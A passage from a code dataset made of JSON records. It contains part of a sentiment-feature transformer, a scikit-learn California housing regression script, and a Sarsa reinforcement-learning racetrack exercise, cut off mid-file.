documentCollection.find_one({'document_id': document})\n raw_document = currentDocument['raw'].lower()\n\n words = word_tokenize(raw_document)\n scores_list = [afinn.score(word) for word in words]\n\n neutral = [zero for zero in scores_list if zero==0]\n polar = [pol for pol in scores_list if pol != 0]\n\n if(neutral !=[] and polar!=[]):\n b = len(polar)/len(neutral)\n else:\n b = 0\n features_to_set['polar_neutral_ratio'] = b\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n # mean_pos mean_neg\n elif self.featureSetConfiguration == 3:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument= documentCollection.find_one({'document_id': document })\n raw_document = currentDocument['raw'].lower()\n\n words = word_tokenize(raw_document)\n scores_list = [afinn.score(word) for word in words]\n\n neutral = [zero for zero in scores_list if zero==0]\n polar = [pol for pol in scores_list if pol != 0]\n\n if(neutral !=[] and polar!=[]):\n b_r = len(polar)/len(neutral)\n else:\n b_r=0\n\n b_a = afinn.score(raw_document)\n features_to_set['afinn_value'] = b_a\n features_to_set['polar_neutral_ratio'] = b_r\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n\n min_max_scaler = MinMaxScaler()\n temp = min_max_scaler.fit_transform(temp)\n # median_pos median_neg\n elif self.featureSetConfiguration == 4:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = {'polar/neutral': 0}\n\n mongoClient.close()\n features = np.array(temp)\n #print('AfinnTransformer:' , self.featureSetConfiguration,' ### X:',len(X),'len(features):',len(features))\n return features\n\n def fit(self, X, y=None, **fit_params):\n return self\n\n ## names are related to featureSetConfiguration\n def get_feature_names(self):\n return sorted(AfinnTransformer.features.keys())\n\n\n\n\n\n\n", "repo_name": "ei08047/ArgTasks", "sub_path": "ArgMine/ffd_en/Transformers/AfinnTransformer.py", "file_name": "AfinnTransformer.py", "file_ext": "py", "file_size_in_byte": 4616, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.Parameters.Parameters", "line_number": 7, "usage_type": "call"}, {"api_name": "afinn.Afinn", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.base.TransformerMixin", "line_number": 23, "usage_type": "name"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 23, "usage_type": "name"}, {"api_name": "pymongo.MongoClient", "line_number": 31, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 50, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 62, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 84, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 85, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}]} +{"seq_id": "18815876090", "text": "from __future__ import division, print_function, unicode_literals\n\nimport os\nimport tarfile\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom six.moves import urllib\nfrom future_encoders import ColumnTransformer, OneHotEncoder\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.model_selection import StratifiedShuffleSplit, train_test_split, cross_val_score, GridSearchCV\nfrom sklearn.pipeline import FeatureUnion, Pipeline\nfrom sklearn.preprocessing import LabelEncoder, LabelBinarizer, StandardScaler, Imputer\nfrom sklearn.ensemble import RandomForestRegressor\n\nwarnings.filterwarnings(action=\"ignore\", message=\"^internal gelsd\")\n\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 2000)\n\nnp.random.seed(42)\n\nplt.rcParams['axes.labelsize'] = 14\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\nrooms_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6\n\n\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n def __init__(self, add_bedrooms_per_room=True): # no *args or **kargs\n self.add_bedrooms_per_room = add_bedrooms_per_room\n\n def fit(self, X, y=None):\n return self # nothing else to do\n\n def transform(self, X, y=None):\n rooms_per_household = X[:, rooms_ix] / X[:, household_ix]\n population_per_household = X[:, population_ix] / X[:, household_ix]\n if self.add_bedrooms_per_room:\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n return np.c_[X, rooms_per_household, population_per_household,\n bedrooms_per_room]\n else:\n return np.c_[X, rooms_per_household, population_per_household]\n\n\n# class DataFrameSelector(BaseEstimator, TransformerMixin):\n# def __init__(self, attribute_names):\n# self.attribute_names = attribute_names\n#\n# def fit(self, X, y=None):\n# return self\n#\n# def transform(self, X):\n# return X[self.attribute_names].values\n\n\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"end_to_end_project\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\n\nDOWNLOAD_ROOT = \"https://raw.githubusercontent.com/ageron/handson-ml/master/\"\nHOUSING_PATH = \"datasets/housing\"\nHOUSING_URL = DOWNLOAD_ROOT + HOUSING_PATH + \"/housing.tgz\"\n\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\n\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n if not os.path.isdir(housing_path):\n os.makedirs(housing_path)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n\n\ndef load_housing_data(housing_path=HOUSING_PATH):\n csv_path = os.path.join(housing_path, \"housing.csv\")\n return pd.read_csv(csv_path)\n\n\ndef income_cat_proportions(data):\n return data[\"income_cat\"].value_counts() / len(data)\n\n\ndef display_scores(scores):\n print(\"Scores:\", scores)\n print(\"Mean:\", scores.mean())\n print(\"Standard deviation:\", scores.std())\n\n\nhousing = load_housing_data()\n\nprint(housing.head(30))\nprint(housing.info())\nprint(housing[\"ocean_proximity\"].value_counts())\nprint(housing.describe())\n\nhousing[\"income_cat\"] = np.ceil(housing[\"median_income\"] / 1.5)\nhousing[\"income_cat\"].where(housing[\"income_cat\"] < 5, 5.0, inplace=True)\n\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\nfor train_index, test_index in split.split(housing, housing[\"income_cat\"]):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]\n\nprint(strat_test_set[\"income_cat\"].value_counts() / len(strat_test_set))\nprint(housing[\"income_cat\"].value_counts() / len(housing))\n\ntrain_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)\n\ncompare_props = pd.DataFrame({\n \"Overall\": income_cat_proportions(housing),\n \"Stratified\": income_cat_proportions(strat_test_set),\n \"Random\": income_cat_proportions(test_set),\n}).sort_index()\ncompare_props[\"Rand. %error\"] = 100 * compare_props[\"Random\"] / compare_props[\"Overall\"] - 100\ncompare_props[\"Strat. %error\"] = 100 * compare_props[\"Stratified\"] / compare_props[\"Overall\"] - 100\nprint(compare_props)\n\nfor set_ in (strat_train_set, strat_test_set):\n set_.drop([\"income_cat\"], axis=1, inplace=True)\n\n# visualizando os dados\n\nhousing = strat_train_set.copy()\n\n# california_img = mpimg.imread(PROJECT_ROOT_DIR + '/images/end_to_end_project/california.png')\n# ax = housing.plot(kind=\"scatter\", x=\"longitude\", y=\"latitude\", figsize=(10,7),\n# s=housing['population']/100, label=\"Population\",\n# c=\"median_house_value\", cmap=plt.get_cmap(\"jet\"),\n# colorbar=False, alpha=0.4,\n# )\n# plt.imshow(california_img, extent=[-124.55, -113.80, 32.45, 42.05], alpha=0.5,\n# cmap=plt.get_cmap(\"jet\"))\n# plt.ylabel(\"Latitude\", fontsize=14)\n# plt.xlabel(\"Longitude\", fontsize=14)\n#\n# prices = housing[\"median_house_value\"]\n# tick_values = np.linspace(prices.min(), prices.max(), 11)\n# cbar = plt.colorbar()\n# cbar.ax.set_yticklabels([\"$%dk\"%(round(v/1000)) for v in tick_values], fontsize=14)\n# cbar.set_label('Median House Value', fontsize=16)\n#\n# plt.legend(fontsize=16)\n# save_fig(\"california_housing_prices_plot\")\n# plt.show()\n\ncorr_matrix = housing.corr()\nprint(corr_matrix[\"median_house_value\"].sort_values(ascending=False))\n\n# attributes = [\"median_house_value\", \"median_income\", \"total_rooms\",\n# \"housing_median_age\"]\n# scatter_matrix(housing[attributes], figsize=(12, 8))\n# save_fig(\"scatter_matrix_plot\")\n\nhousing[\"rooms_per_household\"] = housing[\"total_rooms\"] / housing[\"households\"]\nhousing[\"bedrooms_per_room\"] = housing[\"total_bedrooms\"] / housing[\"total_rooms\"]\nhousing[\"population_per_household\"] = housing[\"population\"] / housing[\"households\"]\n\ncorr_matrix = housing.corr()\ncorr_matrix[\"median_house_value\"].sort_values(ascending=False)\n\n# preparando para machine learning\nhousing = strat_train_set.drop(\"median_house_value\", axis=1)\nhousing_labels = strat_train_set[\"median_house_value\"].copy()\n\nhousing.dropna(subset=[\"total_bedrooms\"]) # remove as linhas que contêm valores nulos\nhousing.drop(\"total_bedrooms\", axis=1) # remove a coluna inteira\nmedian = housing[\"total_bedrooms\"].median()\nhousing[\"total_bedrooms\"].fillna(median) # substitui os valores nulos pela mediana\n\nimputer = Imputer(strategy=\"median\")\nhousing_num = housing.drop(\"ocean_proximity\", axis=1) # remover atributos não numéricos\nimputer.fit(housing_num) # usar sklearn para completar os valores nulos com a mediana\nprint(imputer.statistics_)\n\nX = imputer.transform(housing_num)\nhousing_tr = pd.DataFrame(X, columns=housing_num.columns)\n\nencoder = LabelEncoder() # pŕoblema que os algoritmos de ml acham que categorias mais próximas são similares\nhousing_cat = housing[\"ocean_proximity\"]\nhousing_cat_encoded = encoder.fit_transform(housing_cat)\nprint(housing_cat_encoded)\n\nencoder = OneHotEncoder()\nhousing_cat_1hot = encoder.fit_transform(housing_cat_encoded.reshape(-1, 1))\nprint(housing_cat_1hot)\n\nencoder = LabelBinarizer()\nhousing_cat_1hot = encoder.fit_transform(housing_cat)\nprint(housing_cat_1hot)\n\nattr_adder = CombinedAttributesAdder(add_bedrooms_per_room=False)\nhousing_extra_attribs = attr_adder.transform(housing.values)\n\nhousing_extra_attribs = pd.DataFrame(\n housing_extra_attribs,\n columns=list(housing.columns)+[\"rooms_per_household\", \"population_per_household\"])\nprint(housing_extra_attribs.head())\n\nnum_attribs = list(housing_num)\ncat_attribs = [\"ocean_proximity\"]\n\nnum_pipeline = Pipeline([\n # ('selector', DataFrameSelector(num_attribs)),\n ('imputer', Imputer(strategy=\"median\")),\n ('attribs_adder', CombinedAttributesAdder()),\n ('std_scaler', StandardScaler()),\n ])\n\n# cat_pipeline = Pipeline([\n# ('selector', DataFrameSelector(cat_attribs)),\n# ('cat_encoder', OneHotEncoder()),\n# ])\n\nfull_pipeline = ColumnTransformer([\n (\"num\", num_pipeline, num_attribs),\n (\"cat\", OneHotEncoder(), cat_attribs),\n ])\n\nhousing_prepared = full_pipeline.fit_transform(housing)\nprint(housing_prepared)\nprint(housing_prepared.shape)\n\n# Trainando o modelo\nlin_reg = LinearRegression()\nlin_reg.fit(housing_prepared, housing_labels)\n\nsome_data = housing.iloc[:5]\nsome_labels = housing_labels.iloc[:5]\nsome_data_prepared = full_pipeline.transform(some_data)\nprint(\"Predictions:\\t\", lin_reg.predict(some_data_prepared))\nprint(\"Labels:\\t\\t\", list(some_labels))\n\nhousing_predictions = lin_reg.predict(housing_prepared)\nlin_mse = mean_squared_error(housing_labels, housing_predictions)\nlin_rmse = np.sqrt(lin_mse)\nprint(lin_rmse)\n\ntree_reg = DecisionTreeRegressor()\ntree_reg.fit(housing_prepared, housing_labels)\nhousing_predictions = tree_reg.predict(housing_prepared)\ntree_mse = mean_squared_error(housing_labels, housing_predictions)\ntree_rmse = np.sqrt(tree_mse)\nprint(tree_rmse)\n\nscores = cross_val_score(tree_reg, housing_prepared, housing_labels, scoring='neg_mean_squared_error', cv=10)\nrmse_scores = np.sqrt(-scores)\ndisplay_scores(rmse_scores)\n\nforest_reg = RandomForestRegressor()\nforest_reg.fit(housing_prepared, housing_labels)\nhousing_predictions = forest_reg.predict(housing_prepared)\nforest_mse = mean_squared_error(housing_labels, housing_predictions)\nforest_rmse = np.sqrt(forest_mse)\nprint(forest_rmse)\nscores = cross_val_score(forest_reg, housing_prepared, housing_labels, scoring='neg_mean_squared_error', cv=10)\nrmse_scores = np.sqrt(-scores)\ndisplay_scores(rmse_scores)\n\nparam_grid = [\n {'n_estimators': [3, 10, 30, 40, 50], 'max_features': [2, 4, 5, 6, 7, 8]},\n {'bootstrap': [False], 'n_estimators': [3, 10], 'max_features': [2, 3, 4]}\n]\n\nforest_reg = RandomForestRegressor()\n\ngrid_search = GridSearchCV(forest_reg, param_grid, cv=5, scoring='neg_mean_squared_error')\ngrid_search.fit(housing_prepared, housing_labels)\nprint(grid_search.best_params_)\nprint(grid_search.best_estimator_)\ncvres = grid_search.cv_results_\nfor mean_score, params in zip(cvres['mean_test_score'], cvres['params']):\n print(np.sqrt(-mean_score), params)\n\nfeature_importances = grid_search.best_estimator_.feature_importances_\nprint(feature_importances)\nextra_attribs = ['rooms_per_hhold', 'pop_per_hhold', 'bedrooms_per_rooms']\ncat_one_hot_attribs = list(encoder.classes_)\nattributes = num_attribs + extra_attribs + cat_one_hot_attribs\nsorted(zip(feature_importances))\n\nfinal_model = grid_search.best_estimator_\n\nX_test = strat_test_set.drop(\"median_house_value\", axis=1)\nY_test = strat_test_set[\"median_house_value\"].copy()\n\nX_test_prepared = full_pipeline.transform(X_test)\n\nfinal_predictions = final_model.predict(X_test_prepared)\nfinal_mse = mean_squared_error(Y_test, final_predictions)\nfinal_rmse = np.sqrt(final_mse)\ndisplay_scores(final_rmse)\n", "repo_name": "higornucci/classificacao-aulas", "sub_path": "handson/housing.py", "file_name": "housing.py", "file_ext": "py", "file_size_in_byte": 11301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 28, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 29, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 35, "usage_type": "name"}, {"api_name": "sklearn.base.TransformerMixin", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.c_", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.c_", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "six.moves.urllib.request.urlretrieve", "line_number": 85, "usage_type": "call"}, {"api_name": "six.moves.urllib.request", "line_number": 85, "usage_type": "attribute"}, {"api_name": "six.moves.urllib", "line_number": 85, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedShuffleSplit", "line_number": 116, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.Imputer", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 193, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 195, "usage_type": "call"}, {"api_name": "future_encoders.OneHotEncoder", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelBinarizer", "line_number": 204, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 211, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 219, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.Imputer", "line_number": 221, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 223, "usage_type": "call"}, {"api_name": "future_encoders.ColumnTransformer", "line_number": 231, "usage_type": "call"}, {"api_name": "future_encoders.OneHotEncoder", "line_number": 233, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 241, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 252, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 255, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 259, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 263, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 266, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 270, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 273, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 281, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 307, "usage_type": "call"}]} +{"seq_id": "34070809706", "text": "#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# # Sutton and Barto Racetrack: Sarsa\r\n# Exercise 5.8 from *Reinforcement Learning: An Introduction* by Sutton and Barto.\r\n# \r\n# This notebook applies the **Sarsa** algorithm from Chapter 6 to the Racetrack problem from Chapter 5. \r\n# \r\n# Python Notebook by Patrick Coady: [Learning Artificial Intelligence](https://learningai.io/)\r\n\r\n# In[1]:\r\n\r\n\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# In[2]:\r\n\r\n\r\nclass RaceTrack(object):\r\n \"\"\"\r\n RaceTrack object maintains and updates the race track \r\n state. Interaction with the class is through\r\n the take_action() method. The take_action() method returns\r\n a successor state and reward (i.e. s' and r)\r\n\r\n The class constructor is given a race course as a list of \r\n strings. The constructor loads the course and initializes \r\n the environment state.\r\n \"\"\"\r\n\r\n def __init__(self, course):\r\n \"\"\"\r\n Load race course, set any min or max limits in the \r\n environment (e.g. max speed), and set initial state.\r\n Initial state is random position on start line with \r\n velocity = (0, 0).\r\n\r\n Args:\r\n course: List of text strings used to construct\r\n race-track.\r\n '+': start line\r\n '-': finish line\r\n 'o': track\r\n 'X': wall\r\n\r\n Returns:\r\n self\r\n \"\"\"\r\n self.NOISE = 0.0\r\n self.EPS = 0.1 # epsilon-greedy coefficient\r\n self.MAX_VELOCITY = 4\r\n self.start_positions = []\r\n self.course = None\r\n self._load_course(course)\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n\r\n def take_action(self, action):\r\n \"\"\"\r\n Take action, return state' and reward\r\n\r\n Args:\r\n action: 2-tuple of requested change in velocity in x- and\r\n y-direction. valid action is -1, 0, +1 in each axis.\r\n\r\n Returns:\r\n reward: integer\r\n \"\"\"\r\n\r\n self._update_velocity(action)\r\n self._update_position()\r\n if self.is_terminal_state():\r\n return 100.0\r\n\r\n return -1.0\r\n\r\n def get_state(self):\r\n \"\"\"Return 2-tuple: (position, velocity). Each is a 2D numpy array.\"\"\"\r\n return self.position.copy(), self.velocity.copy()\r\n\r\n def _update_velocity(self, action):\r\n \"\"\"\r\n Update x- and y-velocity. Clip at 0 and self.MAX_VELOCITY\r\n\r\n Args:\r\n action: 2-tuple of requested change in velocity in x- and\r\n y-direction. valid action is -1, 0, +1 in each axis. \r\n \"\"\"\r\n if np.random.rand() > self.NOISE:\r\n self.velocity += np.array(action, dtype=np.int16)\r\n self.velocity = np.minimum(self.velocity, self.MAX_VELOCITY)\r\n self.velocity = np.maximum(self.velocity, 0)\r\n\r\n def reset(self):\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n\r\n def _update_position(self):\r\n \"\"\"\r\n Update position based on present velocity. Check at fine time \r\n scale for wall or finish. If wall is hit, set position to random\r\n position at start line. If finish is reached, set position to \r\n first crossed point on finish line.\r\n \"\"\"\r\n for tstep in range(0, self.MAX_VELOCITY + 1):\r\n t = tstep / self.MAX_VELOCITY\r\n pos = self.position + np.round(self.velocity * t).astype(np.int16)\r\n if self._is_wall(pos):\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n return\r\n if self._is_finish(pos):\r\n self.position = pos\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n return\r\n self.position = pos\r\n\r\n def _random_start_position(self):\r\n \"\"\"Set car to random position on start line\"\"\"\r\n self.position = np.array(random.choice(self.start_positions),\r\n dtype=np.int16)\r\n\r\n def _load_course(self, course):\r\n \"\"\"Load course. Internally represented as numpy array\"\"\"\r\n y_size, x_size = len(course), len(course[0])\r\n self.course = np.zeros((x_size, y_size), dtype=np.int16)\r\n for y in range(y_size):\r\n for x in range(x_size):\r\n point = course[y][x]\r\n if point == 'o':\r\n self.course[x, y] = 1\r\n elif point == '-':\r\n self.course[x, y] = 0\r\n elif point == '+':\r\n self.course[x, y] = 2\r\n elif point == 'W':\r\n self.course[x, y] = -1\r\n # flip left/right so (0,0) is in bottom-left corner\r\n self.course = np.fliplr(self.course)\r\n for y in range(y_size):\r\n for x in range(x_size):\r\n if self.course[x, y] == 0:\r\n self.start_positions.append((x, y))\r\n\r\n def _is_wall(self, pos):\r\n \"\"\"Return True is position is wall\"\"\"\r\n return self.course[pos[0], pos[1]] == -1\r\n\r\n def _is_finish(self, pos):\r\n \"\"\"Return True if position is finish line\"\"\"\r\n return self.course[pos[0], pos[1]] == 2\r\n\r\n def is_terminal_state(self):\r\n \"\"\"Return True at episode terminal state\"\"\"\r\n return (self.course[self.position[0],\r\n self.position[1]] == 2)\r\n\r\n def action_to_tuple(self, a):\r\n \"\"\"Convert integer action to 2-tuple: (ax, ay)\"\"\"\r\n ax = a // 3 - 1\r\n ay = a % 3 - 1\r\n\r\n return ax, ay\r\n\r\n def tuple_to_action(self, a):\r\n \"\"\"Convert 2-tuple to integer action: {0-8}\"\"\"\r\n return int((a[0] + 1) * 3 + a[1] + 1)\r\n\r\n def greedy_eps(self, Q):\r\n \"\"\"Based on state and Q values, return epsilon-greedy action\"\"\"\r\n s = self.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n if np.random.rand() > self.EPS:\r\n print(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n if (np.max(Q[s_x, s_y, s_vx, s_vy, :, :]) ==\r\n np.min(Q[s_x, s_y, s_vx, s_vy, :, :])):\r\n a = (0, 0)\r\n else:\r\n a = np.argmax(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n a = np.unravel_index(a, (3, 3)) - np.array([1, 1])\r\n a = (a[0], a[1])\r\n else:\r\n a = self.action_to_tuple(random.randrange(9))\r\n\r\n return a\r\n\r\n def srts(self,Q):\r\n pass\r\n\r\n\r\n def state_action(self, s, a):\r\n \"\"\"Build state-action tuple for indexing Q NumPy array\"\"\"\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n a_x, a_y = a[0] + 1, a[1] + 1\r\n s_a = (s_x, s_y, s_vx, s_vy, a_x, a_y)\r\n\r\n return s_a\r\n\r\n # In[3]:\r\n\r\n\r\n# Race Track from Sutton and Barto Figure 5.6\r\n\r\nbig_course = ['WWWWWWWWWWWWWWWWWW',\r\n 'WWWWooooooooooooo+',\r\n 'WWWoooooooooooooo+',\r\n 'WWWoooooooooooooo+',\r\n 'WWooooooooooooooo+',\r\n 'Woooooooooooooooo+',\r\n 'Woooooooooooooooo+',\r\n 'WooooooooooWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWWooooooWWWWWWWW',\r\n 'WWWWooooooWWWWWWWW',\r\n 'WWWW------WWWWWWWW']\r\n\r\n# Tiny course for debug\r\n\r\ntiny_course = ['WWWWWW',\r\n 'Woooo+',\r\n 'Woooo+',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'W--WWW', ]\r\n\r\n# In[4]:\r\n\r\n\r\n# Problem Initialization\r\n\r\ncourse = big_course\r\nx_size, y_size = len(course[0]), len(course)\r\n# Q[x_pos, y_pos, x_velocity, y-velocity, x-acceleration, y-acceleration]\r\nQ = np.zeros((x_size, y_size, 5, 5, 3, 3), dtype=np.float64)\r\nposition_map = np.zeros((x_size, y_size), dtype=np.float64) # track explored positions\r\n\r\nN = 2000 # num episodes\r\ngamma = 1.0\r\nalpha = 0.1\r\ntrack = RaceTrack(course)\r\n\r\n# Sarsa\r\n\r\nepochs = []\r\ncounts = []\r\ncount = 0\r\nfor e in range(N):\r\n if (e + 1) % 200 == 0: print('Episode {}'.format(e + 1))\r\n track.reset()\r\n s = track.get_state()\r\n a = track.greedy_eps(Q)\r\n\r\n while not track.is_terminal_state():\r\n position_map[s[0][0], s[0][1]] += 1\r\n count += 1\r\n r = track.take_action(a)\r\n s_prime = track.get_state()\r\n a_prime = track.greedy_eps(Q)\r\n s_a = track.state_action(s, a)\r\n s_a_prime = track.state_action(s_prime, a_prime)\r\n Q[s_a] = Q[s_a] + alpha * (r + gamma * Q[s_a_prime] - Q[s_a])\r\n s, a = s_prime, a_prime\r\n epochs.append(e)\r\n counts.append(count)\r\n\r\n\r\n\r\n\r\n\r\n# In[5]:\r\n\r\n\r\nplt.plot(epochs, counts)\r\nplt.title('Simulation Steps vs. Episodes')\r\nplt.xlabel('Epochs')\r\nplt.ylabel('Total Simulation Steps')\r\nplt.show()\r\n\r\n# In[6]:\r\n\r\n\r\nprint('Heat map of position exploration:')\r\nplt.imshow(np.flipud(position_map.T), cmap='hot', interpolation='nearest')\r\nplt.show()\r\n\r\n# In[7]:\r\n\r\n\r\n# Convert Q (action-values) to pi (policy)\r\npi = np.zeros((x_size, y_size, 5, 5), dtype=np.int16)\r\nfor idx in np.ndindex(x_size, y_size, 5, 5):\r\n a = np.argmax(Q[idx[0], idx[1], idx[2], idx[3], :, :])\r\n a = np.unravel_index(a, (3, 3))\r\n 